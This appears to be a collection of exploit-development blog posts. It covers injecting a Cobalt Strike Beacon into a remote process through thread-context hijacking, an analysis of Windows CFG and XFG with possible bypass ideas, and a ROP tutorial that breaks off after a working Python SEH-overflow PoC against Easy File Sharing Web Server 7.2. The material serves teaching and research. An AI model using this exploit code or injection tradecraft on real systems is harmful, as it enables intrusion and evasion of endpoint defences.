There we go, our BOF successfully ran. Now, let’s examine what we are working with in WinDbg. As we can see, the address of our final buffer is shown in the Current RIP: 0x1f027f20000 output line. Let’s view this in WinDbg.

Great! Everything seems to be in place. As is shown in the mov rax,offset ntdll!NtContinue instruction, we can see our NtContinue routine. The beginning of the NtContinue routine should call the address of the stack alignment and CreateThread shellcode, as mentioned earlier in this blog post. Let’s see what the address 0x000001f027f20510 references, which is the memory address being called.

Perfect! As we can see by the and rsp, 0FFFFFFFFFFFFFFFF0 instruction, along with the address of KERNEL32!CreateThreadStub, the NtContinue routine will first call the stack alignment and CreateThread routines. In this case, we are good to go! Let’s start now walking through execution of the code.

Upon SetThreadContext being invoked, which changes the RIP register to execute our shellcode, we can see that execution has reached the first call, which will invoke the stack alignment and CreateThread routines. Stepping through this call, as we know, will push a return address onto the stack. As mentioned previously, this will be the address of that next call 0x000001f027f2000a instruction. When the CreateThread routine returns, it will return to this address. After stepping through the instruction, we can see that the address of the next call is pushed onto the stack.

Execution then reaches the bitwise AND instruction. As we can see from the above image, and rsp, 0FFFFFFFFFFFFFFF0 is redundant, as the stack pointer is already 16-byte aligned (the last 4 bits are already set to 0). Stepping through the bitwise XOR operations, RCX and RDX are set to 0.

As we know from the CreateThread prototype, the lpStartAddress parameter is a pointer to our shellcode. Looking at the above image, we can see the third argument, which will be loaded into R8, is 0x1f027ee0000. Unassembling this address in the debugger discloses this is our Beacon implant, which was injected earlier! TO verify this, you can generate a raw Beacon stageless artifact in Cobalt Strike manually and run it through hexdump to verify the first few opcodes correspond.

After stepping through the instruction, the value is loaded into the R8 register. The next instruction sets R9 to 0 via xor r9, r9.

Additionally, [RSP + 0x20] and [RSP + 0x28] are set to 0, by copying the value of R9, which is now 0, to these locations. Here is what [RSP + 0x20] and [RSP + 0x28] look like before the mov [rsp + 0x20], r9 and mov [rsp + 0x28], r9 instructions and after.

After, CreateThread is placed into RAX and is called. Note CreateThread is actually CreateThreadStub. This is because most former kernel32.dll functions were placed in a DLL called KERNELBASE.DLL. These β€œstub” functions essentially just redirect execution to the correct KERNELBASE.dll function.

Stepping over the function, with p in WinDbg, places the CreateThread return value, into RAX - which is a handle to the local thread containing the Beacon implant.

After execution of our NtContinue routine is complete, we will receive the Beacon callback as a result of this thread.

Additionally, we can see that RSP is set to the first β€œreal” instruction of our NtContinue routine. A ret instruction, which is what is in RIP currently, will take the stack pointer (RSP) and place it into RIP. Executing the return redirects execution back to the NtContinue routine.

As we can see in the image above, the next call instruction calls the pop rcx instruction. This call instruction, when executed, will push the address of the pop rcx instruction onto the stack, as a return address.

Executing the pop rcx instruction, we can see that RCX now contains the address, in memory, of the pop rcx instruction. This will be the base address used in the RVA calculations to resolve the address of the preserved CONTEXT record.

To verify if our offset is correct, we can use .cxr in WinDbg to divulge if the contiguous memory block located at RCX + 0x36 is in fact a CONTEXT record. 0x36 is chosen, as this is the value currently that is about to be added to RCX, as seen a few screenshots ago. Verifying with WinDbg, we can see this is the case.

If this would not have been the correct location of the CONTEXT record, this WinDbg extension would have failed, as the memory block would not have been parsed correctly.

Now that we have verified our CONTEXT record is in the correct place, we can perform the RVA calculation to add the correct distance to the CONTEXT record, meaning the pointer is then stored in RCX, fulfilling the PCONTEXT parameter of NtContinue.

Stepping through xor rdx, rdx, which sets the RaiseAlert parameter of NtContinue to FALSE, execution lands on the call rax instruction, which will call NtContinue.

Pressing g in the debugger then shows us quite a few of DLLs are mapped into notepad.exe.

This is the Beacon implant resolving needed DLLs for various function calls - meaning our Beacon implant has been executed! If we go back into Cobalt Strike, we can see we now have a Beacon in context of notepad.exe with the same PID of 7548!

Additionally, you will notice on the victim machine that notepad.exe is fully functional! We have successfully forced a remote thread to execute our payload and restored it, all in one go.

Final Thoughts

Obviously, this technique isn’t without its flaws. There are still IOCs for this technique, including invoking SetThreadContext, amongst other things. However, this does avoid invoking any sort of action that creates a remote thread, which is still useful in most situations. This technique could be taken further, perhaps with invoking direct system calls versus invoking these APIs, which are susceptible to hooking, with most EDR products.

Additionally, one thing to note is that since this technique suspends a thread and then resumes it, you may have to wait a few moments to even a few minutes, in order for the thread to get around to executing. Interacting with the process directly will force execution, but targeting Windows processes that perform execution often is a good target also to avoid long waits.

I had a lot of fun implementing this technique into a BOF and I am really glad I have a reason to write more C code! Like always: peace, love, and positivity :-).

Exploit Development: Between a Rock and a (Xtended Flow) Guard Place: Examining XFG

23 August 2020 at 00:00


Previously, I have blogged about ROP and the benefits of understanding how it works. Not only is it a viable first-stage payload for obtaining native code execution, but it can also be leveraged for things like arbitrary read/write primitives and data-only attacks. Unfortunately, if your end goal is native code execution, there is a good chance you are going to need to overwrite a function pointer in order to hijack control flow. Taking this into consideration, Microsoft implemented Control Flow Guard, or CFG, as an optional update back in Windows 8.1. Although it was released before Windows 10, it did not really catch on in terms of β€œmainstream” exploitation until recent years.

After a few years, and a few bypasses along the way, Microsoft decided they needed a new Control Flow Integrity (CFI) solution - hence XFG, or Xtended Flow Guard. David Weston gave an overview of XFG at his talk at BlueHat Shanghai 2019, and it is pretty much the only public information we have at this time about XFG. This β€œfiner-grained” CFI solution will be the subject of this blog post. A few things before we start about what this post is and what it isn’t:

  1. This post is not an β€œXFG internals” post. I don’t know every single low level detail about it.
  2. Don’t expect any bypasses from this post - this mitigation is still very new and not very explored.
  3. We will spend a bit of time understanding what indirect function calls are via function pointers, what CFG is, and why XFG is a very, very nice mitigation (IMO).

This is simply going to be an β€œorganized brain dump” and isn’t meant to be a β€œlearn everything you need to know about XFG in one sitting” post. This is just simply documenting what I have learned after messing around with XFG for a while now.

The Blueprint for XFG: CFG

CFG is a pretty well documented exploit mitigation, and I have done my fair share of documenting it as well. However, for completeness sake, let’s talk about how CFG works and its potential shortcomings.

Note that before we begin, Microsoft deserves recognition for being one of the leaders in implementing a Control Flow Integrity (CFI) initiative and among the first to actually release a CFI solution.

Firstly, to enable CFG, a program is compiled and linked with the /guard:cf flag. This can be done through the Microsoft Visual Studio tool cl (which we will look at later). However, more easily, this can be done by opening Visual Studio and navigating to Project -> Properties -> C/C++ -> Code Generation and setting Control Flow Guard to Yes (/guard:cf)

CFG at this point would now be enabled for the program - or in the case of Microsoft binaries, they would already be CFG enabled (most of them). This causes a bitmap to be created, which essentially is made up of all functions within the process space that are β€œprotected by CFG”. Then, before an indirect function call is made (we will explore what an indirect call is shortly if you are not familiar), the function being called is sent to a special CFG function. This function checks to make sure that the function being called is a part of the CFG bitmap. If it is, the call goes through. If it isn’t, the call fails.

Since this is a post about XFG, not CFG, we will skip over the technical details of CFG. However, if you are interested to see how CFG works at a lower level, Morten Schenk has an excellent post about its implementation in user mode (the Windows kernel has been compiled with CFG, known as kCFG, since Windows 10 1703. Note that Virtualization-Base Security, or VBS, is required for kCFG to be enforced. However, even when VBS is disabled, kCFG has some limited functionality. This is beyond the scope of this blog post).

Moving on, let’s examine how an indirect function call (e.g. call [rax] where RAX contains a function address or a function pointer), which initiates a control flow transfer to a different part of an application, looks without CFG or XFG. To do this, let’s take a look at a very simple program that performs a control flow transfer.

Note that you will need Microsoft Visual Studio 2019 Preview 16.5 or greater in order to follow along.

Let’s talk about what is happening here. Firstly, this code is intentionally written this way and is obviously not the most efficient way to do this. However, it is done this way to help simulate a function pointer overwrite and the benefits of XFG/CFG.

Firstly, we have a function called void cfgTest() that just prints a sentence. This function is then assigned to a function pointer called void (*cfgTest1), which actually is an array. Then, in the main() function, the function pointer void (*cfgTest1) is executed. Since void (*cfgtest1) is pointing to void cfgTest(), this will actually just cause void (*cfgtest1) to just execute void cfgTest(). This will create a control flow transfer, as the main() function will perform a call to the void (*cfgTest1) function, which will then call the void cfgTest() function.

To compile with the command line tool cl, type in β€œx64 Native Tools Command Prompt for VS 2019 Preview” in the Start menu and run the program as an administrator.

This will drop you into a special Command Prompt. From here, you will need to navigate to the installation path of Visual Studio, and you will be able to use the cl tool for compilation.

Let’s compile our program now!

The above command essentially compiles the program with the /Zi flag and the /INCREMENTAL:NO linking option. Per Microsoft Docs, /Zi is used to create a .pdb file for symbols (which will be useful to us). /INCREMENTAL:NO has been set to instruct cl not to use the incremental linker. This is because the incremental linker is essentially used for optimization, which can create things like jump thunks. Jump thunks are essentially small functions that only perform a jump to another function. An example would be, instead of call function1, the program would actually perform a call j_function1. j_function1 would simply be a function that performs a jmp function1 instruction. This functionality will be turned off for brevity. Since our β€œdummy program” is so simple, it will be optimized very easily. Knowing this, we are disabling incremental linking in order to simulate a β€œRelease” build (we are currently building β€œDebug” builds) of an application, where incremental linking would be disabled by default. However, none of this is really prevalent here - just a point of contention to the reader. Just know we are doing it for our purposes.

The result of the compilation command will place the output file, named Source.exe in this case, into the current directory along with a symbol file (.pdb). Now, we can open this application in IDA (you’ll need to run IDA as an administrator, as the application is in a privileged directory). Let’s take a look at the main() function.

Let’s examine the assembly above. The above function loads the void (*cfgTest1) function pointer into RCX. Since void (*cfgTest1) is a function pointer to an array, the value in RCX itself isn’t what is needed to jump to the array. Only when RCX is dereferenced in the call qword ptr [rcx+rax] instruction does program execution actually perform a control flow transfer to void (*cfgTest1)’s first index - which is void cfgTest(). This is why call qword ptr [rcx+rax] is being performed, as RAX is the position in the array that is being indexed.

Taking a look at the call instruction in IDA, we can see that clearly this will redirect program execution to void cfgTest().

Additionally, in WinDbg, we can see that Source!cfgTest1, which is a function, points to Source!cfgTest.

Nice! We know that our program will redirect execution from main() to void (*cfgTest1) and then to void cfgTest()! Let’s say as an attacker, we had an arbitrary write primitive and we were able to overwrite what void (*cfgTest1) points to. We could actually change where the application actually ends up calling! This is not good from a defensive perspective.

Can we mitigate this issue? Let’s go back and recompile our application with CFG this time and find out.

This time, we add /guard:cf as a flag, as well as a linking option.

Disassembling the main() function in IDA again, we notice things look a bit different.

Very interesting! Instead of making a call directly to void (*cfgTest1) this time, it seems as though the function __guard_disaptch_icall_fptr will be invoked. Let’s set a breakpoint in WinDbg on main() and see how this looks after invoking the CFG dispatch function.

After setting a breakpoint on the main() function, code execution hits the CFG dispatch function.

The CFG dispatch function then performs a dereference and jumps to ntdll!LdrpDispatchUserCallTarget.

We won’t get into the technical details about what happens here, as this post isn’t built around CFG and Morten’s blog already explains what will happen. But essentially, at a high level, this function will check the CFG bitmap for the Source.exe process and determine if the void cfgTest() function is a valid target (a.k.a if it’s in the bitmap). Obviously this function hasn’t been overwritten, so we should have no problems here. After stepping through the function, control flow should transfer back to the void cfgTest() function seamlessly.

Execution has returned back to the void cfgTest() function. Additionally what is nice, is the lack of overhead that CFG put on the program itself. The check was very quick because Microsoft opted to use a bitmap instead of indexing an array or some other structure.

You can also see what functions are protected by the CFG bitmap by using the dumpbin tool within the Visual Studio installation directory and the special Visual Studio Command Prompt. You can use the command dumpbin /loadconfig APPLICATION.exe to view this.

Let’s see if we can take this even further and potentially show why XFG is defintley a better/more viable option than CFG.

CFG: Potential Shortcomings

As mentioned earlier, CFG checks functions to make sure they are part of the β€œCFG bitmap” (a.k.a protected by CFG). This means a few things from an adversarial perspective. If we were to use VirtualAlloc() to allocate some virtual memory, and overwrite a function pointer that is protected by CFG with the returned address of the allocation - CFG would make the program crash.

Why? VirtualAlloc() (for instance) would return a virtual address of something like 0xdb0000. When the application in question was compiled with CFG, obviously this memory address wasn’t a part of the application. Therefore, this address wouldn’t be β€œprotected by CFG” and the program would crash. However, this is not very practical. Let’s think about what an adversary tries to accomplish with ROP.

Adversaries want to return into a Windows API function like VirtualProtect() in order to dynamically change permissions of memory. What is interesting about CFG is that in addition to the program’s functions, all exported Windows functions that make up the β€œmodule” import list for a program can be called. For instance, the application we are looking at is called Source.exe Dumping the loaded modules for the application, we can see that KERNELBASE.dll, kernel32.dll, and ntdll.dll (which are the usual suspects) are loaded for this application.

Let’s see if/how this could be abused!

Let’s firstly update our program with a new function.

This program works exactly as the program before, except the function void protectMe2() is added in to add another user defined function to the CFG bitmap. Note that this function will never be executed, and that is poor from a programmer’s perspective. However, this function’s sole purpose is to just show another protected function. This can be verified again with dumpbin.

Here, we can see that Source!cfgTest1 still points to Source!cfgTest

Let’s recall what was said earlier about how CFG only validates if a function resides within the CFG bitmap or not. Let’s now perform a simulated arbitrary write condition in WinDbg to overwrite what Source!cfgTest points to, with Source!protectMe2.

The above command uses x to show the address of the Source!protectMe2 function and then uses dps to show that Source!cfgTest1 still points to Source!cfgTest1. Then, using ep, we overwrite the function pointer. dps once again verifies that the function overwrite has occurred.

Let’s now step through the program to see what happens. Program execution firstly hits the CFG dispatch function.

Looking at the RAX register, which is used to hold the address of the function CFG will check, we see it has been overwritten with Source!protectMe2 instead of Source!cfgTest.

Execution then hits ntdll!LdrpDispatchUserCallTarget. After walking the function, which validates if the in scope function resides within the CFG bitmap for the process, execution redirects to Source!protectMe2!

This is very interesting from an adversarial perspective, as we were successfully able to overwrite a function pointer and CFG didn’t terminate our process! The only caveat being that the function is a part of the current process’s CFG bitmap.

What is even more interesting, is that function pointers protected by CFG can be overwritten by any exported function at runtime! Let’s rework this example, but try to call a Windows API function like KERNELBASE!WriteProcessMemory.

First, we simulate the arbitrary write by overwriting Source!cfgTest1 with KERNELBASE!WriteProcessMemory.

Program execution passes through Source!__guard_dispatch_icall_fptr and ntdll!LdrpDispatchUserCallTarget and we can clearly see execution returns to KERNELBASE!WriteProcessMemory.

This shows that even with CFG enabled, it is still possible to call functions that have overwritten other functions. This is not good, as calls can still be made with malign intent. Additionally, calling functions of different types out of context may result in a type confusion or other programmatic behavioral problems.

Now that we have armed ourselves with an understanding of why CFG is an amazing start to solving the CFI problem, but yet still contains many shortcomings, let’s get into XFG and what makes it better and different.

XFG: The Next Era of CFI for Windows

Let’s start out by talking about what XFG is at a high level. After we go through some high level details about XFG, we will compile our program with XFG and walk through the dispatch function(s), as well as perform some simulated function pointer overwrites to see how XFG reacts and additionally see how XFG differs from CFG.

My last CrowdStrike blog post touches on XFG, but not in too much detail. XFG essentially is a more β€œhardened” version of CFG. How so? XFG, at compile time, produces a β€œtype-based hash” of a function that is going to be called in a control flow transfer. This hash will be placed 8 bytes above the target function, and will be compared against a preserved version of that hash when an XFG dispatch function is executed. If the hashes match, control flow transfer is then passed to the in scope function that was checked. If the hashes differ, the program crashes.

Let’s take a look a bit more at this. Firstly, let’s compile our program with XFG!

Note that you will need Visual Studio 2019 Preview + at least Windows 10 21H1 in order to use XFG. Additionally, XFG is not found in the GUI compilation options.

Using the /guard:xfg flag in compilation and linking, we can enable XFG for our application.

Notice that even though it was not selected, CFG is still enabled for our application.

Let’s crack open IDA again to see how the main() function looks with the addition of XFG.

Very interesting! Firstly, we can see that R10 takes in the value of the XFG β€œtype-based” hash. Then, a call is performed to the XFG dispatch call __guard_xfg_dispatch_icall_fptr. Note that the hash has been deemed β€œimmutable” by Microsoft and cannot be modified by an attacker, due to its read only state.

In the image, below, the location of the XFG hash is at 00007ff7ded4110c

We can see that this address is executable (obviously) and readable - with the ability to write disabled.

Additionally, you can use the dumpbin tool to print out the functions protected by CFG/XFG. Functions protected by XFG are denoted with an X

Before we move on, one interesting thing to note is that the XFG hash is already placed 8 bytes above an XFG protected function BEFORE any code execution actually occurs.

For instance, Source!cfgTest is an XFG protected function. 8 bytes above this function is the hash seen in the previous image, but with an additional bit set.

We will see why this additional bit has been set when we step through the functions that perform XFG checks.

Moving on, let’s step through this in WinDbg to see what we are working with here, and how execution flow will go.

Firstly, execution lands on the XFG dispatch function.

This time, when the __guard_xfg_dispatch_icall_fptr function is dereferenced, a jump to the function ntdll!LdrpDispatchUserCallTargetXFG is performed.

Firstly, a bitwise OR of the XFG hash and 1 occurs, with the result placed in R10. In our case, this sets a bit in the XFG function hash.

Next, a test al, 0xf operation occurs, which performs a bitwise AND between the lower 8 bits of AX (AL) and 0xf.

As we can see from the image above, this sets the zero flag in our case. Additionally, now we have reached a possible jump within ntdll!LdrpDispatchUserCallTargetXFG

Since the zero flag has been set, we will NOT take the jump and instead move on to the next instruction, test ax, 0xFFF.

Stepping through test ax, 0xFFF, which will perform a bitwise AND with the lower 16 bits of EAX and 0xFFF, plus set the zero flag accordingly, we see that we have cleared the zero flag in the image below. This means the jump will not occur, and we continue to move deeper into the ntdll!LdrpDispatchUserCallTargetXFG function.

Finally, we land on the cmp instruction which compares the hash 8 bytes above RAX (our target function) with the hash preserved in R10.

The compare statement, because the values are equal, causes the zero flag to be set. This skips the next jump, and performs the final jump to our target function in RAX!

This is how a function protected by XFG is checked! Let’s now edit our code a bit and explore XFG a bit more.

Let’s Keep Going!

Recall that an XFG hash is made up of a function’s return type and any parameters. Let’s update our code to invoke another function of a different type.

We have changed the protectMe2() function to a function that returns an integer and takes a parameter of the type integer. This is different than our void cfgTest() function. We also set a function pointer, int (*cfgTest2) equal to the int protectMe2() function in order to create a new XFG hash for a different function type (int in this case). Let’s recompile our program and disassemble it in IDA to see how the two functions may vary from an XFG perspective.

Very interesting! As we can see from the above image, there are two different hashes now. The hash for our original function has remained the same. However, the hash for the int protectMe2() function is very different, but the last 12 bits of each hash in hexadecimal is 870 in our case. This interesting and may be worth noting.

Additionally, static and dynamic analysis both show that even before any code has executed, the actual hash that is placed 8 bytes above each function. Additionally, the hashes already have an additional bit set, just as we saw last time.

Let’s take this opportunity to showcase why XFG is significantly stronger than CFG.

Let’s simulate an arbitrary write again by overwriting what Source!cfgTest1 points to with Source!protectMe2.

After simulating the arbitrary write, we pick up execution in ntdll!LdrpDispatchUserCallTargetXFG again. Stepping through a few instructions, we once again land on the cmp instruction which checks to see if the preserved XFG hash matches the current XFG hash.

As we can see below, the hashes do not match!

Since the hashes do not match, this will cause XFG to determine a function pointer has been overwritten with something it should not have been overwritten with - and causes a program crash. Even though the function pointer was overwritten by another function within the same bitmap - XFG still will crash the process.

Let’s examine another scenario, with two functions of the same return type - but not the same amount of parameters.

To achieve this, our code has been edited to the following.

As we can see from the above image, we are using all integer functions now. However, the int cfgTest() function has two more parameters than the int protectMe2() function. Let’s compile and perform some static analysis in IDA.

The only difference between the two functions protected by XFG is the amount of parameters that int cfgTest() has, and yet the hashes are TOTALLY different. From a defensive perspective, it seems like even very similar functions are viewed as β€œvery different”.

Additionally, we notice that the last 12 bits of the int cfgTest() hash have become 371 in hexadecimal instead of the previously mentioned 871 value. This means that XFG hashes seem to be unique until the last 8 bits. This is indicative of the hash only being unique up until about 56 bits.

As a sanity check and for completeness sake, let’s see what happens when two identical functions are assigned an XFG hash.

OMG Samesies!

Here is an edited version of our code, with two identical functions.

Disassembling the functions in IDA, we can see that the hashes this time are identical.

Obviously, since the hashing process for an XFG hash takes a function prototype and hashes it, the two hashes are going to be the same. I would not call this a flaw at all, because it is obvious Microsoft knew to this going in. However, I feel this is a nice win for Microsoft in terms of their overall CFI strategy because as David pointed out, this was very little overhead to the already existing CFG infrastructure.

However, from an adversarial standpoint - it must be said. XFG functions can be overwritten, so long as the function is basically an identical prototype of the original function.

Potential Bypasses?

As mentioned above, utilizing functions of identical prototypes generates identical XFG hashes. Knowing this, it seems as though it could be possible to overwrite a function with an identical function of the same prototype. This is SIGNIFICANTLY stronger than CFG in terms of what functions can actually be called.

Let’s talk about one more (potential) additional potential bypass.

As we know, functions protected by XFG have an XFG hash placed above them (8 bytes above to be more specific). What would happen for instance, if we performed a function pointer overwrite and called into the middle of a function, like KERNELBASE!VirtualProtect.

As we can see from the above image, calling into the middle of this function shows us that these hex numbers are being interpreted as opcodes, not memory addresses. This means that if XFG checks if a function pointer is overwritten by KERNELBASE!VirtualProtect, it would load the address of this function into RAX per the usual routine for XFG/CFG function checks. Then, this address is dereferenced at an offset of negative 8 to perform the XFG check. When this dereference happens, since this address contains opcodes, the opcodes that are present when calling into the middle of the function will be used in the XFG check.

Let’s perform a function pointer overwrite.

Note that the machine was restarted in between screenshots, causing addresses to change (but the symbols will remain the same).

Next, let’s step through the XFG dispatch functions and reach the compare statement.

Hitting the compare statement, we can see that R10 contains the preserved XFG hash, while RAX just contains the address of KERNELBASE!VirtualProtect + 0x50.

Taking a look at RAX - 8, where the XFG check occurs, we can see that the opcodes that reside within KERNELBASE!VirutalProtect are being treated as the β€œcompared hash”.

Although this compare will fail, this brings up an interesting point.

Since calling into a middle of a function results in the function’s data being treated as opcodes and not memory addresses (usually), it may be possible for an adversary to utilize an arbitrary read/write primitive to do the following.

  1. Locate the XFG hash for a function you want to overwrite
  2. Perform a loop to dereference the process space’s memory and look for patterns that are identical to the XFG hash (remember, we still have to abide by CFG’s rules and choosing a function exported by the application or a function that is additionally located in the same bitmap)
  3. Overwrite the function pointer with any viable candidates

Although you most likely are going to be very hard pressed to find anything identical to the hash in terms of opcodes in the middle of a function AND additionally make whatever you find useful from an attacker’s perspective, this is still possible it seems.

Final Thoughts

I think personally that XFG is an awesome mitigation and I am excited to see how people get creative with the solution. However, until CET comes into play, overwriting return addresses on the stack seems like it will still be fair game. I think the combination of XFG and CET is going to be very interesting for exploitation in the future. I think XFG is a great and pretty creative mitigation. However, it has yet to be seen yet how it performs against Indirect Branch Tracking (IBT), which is CET’s forward-edge protection. All together, I think Microsoft has done a great thing with XFG by implementing it and not letting all of the work done with CFG go to waste.

As always! Peace, love, and positivity :-)

The Current State of Exploit Development, Part 2

20 August 2020 at 00:00

CrowdStrike Blog

Today I am very happy to have released my second blog for CrowdStrike! This blog, which builds off of my last one, talks about some additional mitigations like ACG, XFG, and VBS/HVCI which have made exploitation more expensive and time consuming. This blog rounds out the series and I hope you have found it useful! I learned a lot when I put this two part series together.

You can find the blog here. Enjoy!

The Current State of Exploit Development, Part 1

6 August 2020 at 00:00

CrowdStrike Blog

As you may or may not know, I work at CrowdStrike for my day job. I am also apart of the red team and do not do any official exploit development/vulnerability research. I wanted to address why binary exploits often aren’t as used anymore in typical red team toolkits and explain although the impact of a binary exploit, especially in the kernel, is far more effective than typical red team TTPs - is the return on investment worth it? I would love to see, personally, some red team research shift towards kernel exploits for local privilege escalation - which is often one of the more difficult parts of a penetration tests. But is binary exploitation even worth it at this point for red team work? Let’s find out!

Enjoy! Part 1

Exploit Development: Playing ROP’em COP’em Robots with WriteProcessMemory()

11 July 2020 at 00:00


The other day on Twitter, I received a very kind and flattering message about a previous post of mine on the topic of ROP. Thinking about this post, I recall utilizing VirtualProtect() and disabling ASLR system wide to bypass DEP. I also used an outdated debugger, Immunity Debugger at the time, and I wanted to expand on my previous work, with a little bit of a less documented ROP technique and WinDbg.

Why is ROP Important?

ROP/COP and other code reuse apparatuses are very important mitigation bypass techniques, due to their versatility. Binary exploit mitigations have come a long way since DEP. Notably, mitigations such as CFG, upcoming XFG, ACG, etc. have posed an increased threat to exploit writers as time has gone on. ROP still has been the β€œSwiss army knife” to keep binary exploits alive. ROP can result in arbitrary write and arbitrary read primitives - as we will see in the upcoming post. Additionally, data only attacks with the implementation of ACG have become crucial. It is possible to perform data only attacks, although expensive from a technical perspective, by writing payloads fully in ROP.

What This Blog Assumes and What This Blog ISN’T

If you are interested in a remote bypass of ASLR and a 64-bit version of bypassing DEP, I suggest reading a previous blog of mine on this topic (although, undoubtedly, there are better blogs on this subject).

This blog will not address ASLR or 64-bit exploitation (read my previous post if that is what you are looking for) - and will be utilizing non-ASLR compiled modules, as well as the x86 __stdcall calling convention (technically an β€œASLR bypass”, but in my opinion only an information leak = true ASLR bypasses).

Why are these topics not being addressed? This post aims to focus on a different, less documented approach to executing code with ROP. As such, I find it useful to use the most basic, straightforward example to hopefully help the reader fully understand a concept. I am fully aware that it is 2020 and I am well aware mitigations such as CFG are more common. However, generally the last step in exploitation, no matter HOW many mitigations there are (unless you are performing a data only attack), is bypassing DEP (in user mode or kernel mode). This post aims to address the latter portion of the last sentiment - and expects the reader already has an ASLR bypass primitive and a way to pivot to the stack.

Expediting The Process

The application we will be going after is Easy File Sharing Web Server 7.2, which has a memory corruption vulnerability as a result of an HTTP request.

The offset to SEH is 2563 bytes. Instead of using a pop <reg> pop <reg> ret sequence, as is normally done on a 32-bit SEH exploit, an add esp, <bytes> instruction is used. This will take the stack, where it is currently not controlled by us, and change the address to an address on the stack that we control - and then return into it.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain
crash += struct.pack('<L', 0x90909090)

# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only - no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)    # add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host:\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer:\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 80))

Set a breakpoint on the stack pivot of add esp, 0x1004 ; ret with the WinDbg command bp 0x10022869. After sending the exploit POC - we will need to view the contents of the exception handler with the WinDbg command !exchain.

As a breakpoint has already been set on the address inside of SEH, all that is needed to pass the exception is resuming execution with the g command in WinDbg. The breakpoint is hit, and we will step through the instruction of add esp, 0x1004 (t in WinDbg) to take control of the stack.

As a point of contention, we have about 980 bytes to work with.

The Call to WriteProcessMemory()

What is the goal of this method of bypassing DEP? The goal here is to not to dynamically change permissions of memory to make it executable - but to instead write our shellcode, dynamically, to already executable memory.

As we know, when DEP is enabled, memory is either writable or executable - but not both at the same time. The previous sentiment about writing shellcode, via WriteProcessMemory(), to executable memory is a bit contradictory knowing this. If memory is executable, adhering to DEP’s rules, it shouldn’t be writable. WriteProcessMemory() overcomes this by temporarily marking memory pages as RWX while data is being written to a destination - even if that destination doesn’t have writable permissions. After the write succeeds, the memory is then marked again as execute only.

From an adversary’s perspective, this means something. Certain shellcodes employ encoding mechanisms to bypass character filtering. If this is the case, encoded shellcode which is dynamically written to execute only memory will fail when executed. This is due to the encoded shellcode needing to β€œwrite itself” over adjacent process memory to decode. Since pages are execute only, and we do not have the WriteProcessMemory() β€œpass” to write to execute only memory anymore, an access violation will occur. Something to definitely keep in mind.

Let’s take a look at the call to WriteProcessMemory() firstly, to help make sense of all of this (per Microsoft Docs)

BOOL WriteProcessMemory(
  HANDLE  hProcess,
  LPVOID  lpBaseAddress,
  LPCVOID lpBuffer,
  SIZE_T  nSize,
  SIZE_T  *lpNumberOfBytesWritten

Let’s break down the call to WriteProcessMemory() by taking a look at each function argument.

  1. HANDLE hProcess: According to Microsoft Docs, this parameter is a handle to the desired process in which a user wants to write to the process memory. A handle, without going too much into detail, is a β€œreference” or β€œindex” to an object. Generally, a handle is used as a β€œproxy” of sorts to access an object (this is especially true in kernel mode, as user mode cannot directly access kernel mode objects). We will look at how to dynamically resolve this parameter with relative ease. Think of this as β€œdon’t talk to me, talk to my assistant”, where the process is the β€œme” and the handle is the β€œassistant”.
  2. LPVOID lpBaseAddress: This parameter is a pointer to the base address in which a write is desired. For example, if the region of memory you would like to write to was 0x11223344 - 0x11223355, the argument passed to the function call would be 0x11223344.
  3. LPCVOID lpBuffer: This is a pointer to the buffer that is to be written to the address specified by the lpBaseAddress parameter. This will be the pointer to our shellcode.
  4. SIZE_T nSize: The number of bytes to be written (whatever the size of the shellcode + NOPs, if necessary, will be).
  5. SIZE_T *lpNumberOfBytesWritten: This parameter is similar to the VirtualProtect() parameter lpflOldProtect, which inherits the old permissions of modified memory. However, our parameter inherits the number of bytes written. This will need to be a memory address, within the process space, that is writable.

Preserving a Stack Address

One of the pitfalls of ROP is that stack control is absolutely vital. Why? It is logical actually - each ROP gadget is appended with a ret instruction. ret, from a technical perspective, will take the value pointed to by RSP (or ESP in this case), which will be the next ROP gadget on the stack, and load it into RIP (EIP in this case). Since ROP must be performed on the stack, and due to the dynamic nature of the stack, the virtual memory addresses associated with the stack are also dynamic.

As seen below, when the stack pivot is successfully performed, the virtual address of the stack is 0x029a68dc.

Restarting the application and pivoting to the stack again, the virtual address of the stack is at 0x028068dc.

At first glance, this puts us in a difficult position. Even with knowledge of the base addresses of each module, and their static nature - the stack still seems to change! Although the stack is dynamically being resolved to seemingly β€œrandom” and β€œvolatile to the duration of the process” memory - there is a way around this. If we can use a ROP gadget, or set of gadgets, properly - we can dynamically store an address around the stack into a CPU register.

Let’s start our ROP chain by preserving an address near the current stack pointer.

As you may or may not know, the base pointer (EBP) points to the β€œbottom” of the current stack frame (we will refer to the current stack frame as β€œthe stack”). This means that EBP should be relatively close to ESP. We can validate this in WinDbg by viewing the current state of the CPU registers after the stack pivot.

After parsing the PE with rp++, to enumerate a list of ROP gadgets (you can view how to use rp++ by taking a look at my last ROP blog post) - a nice gadget resides in sqlite3.dll that can help us preserve the address of EBP into another β€œcommon” register, which has more useful ROP gadgets as we will see later on, such as EAX.

0x61c05e8c: xchg eax, ebp ; ret  ;  (1 found)

Replace the NOPs in the previous PoC script, under the β€œBegin ROP chain” comment, with the above address. After firing off the updated PoC, we land on our intended ROP gadget.

After executing the above gadget, EAX is now loaded with an address near the current stack.

Notice that EBP has also been set to 0, due to the ROP gadget. This will come into play shortly.

Although EAX is relatively close to ESP - it is still a decent ways away. Currently, EAX (which now contains the old value of EBP) is 0xfec bytes away from ESP.

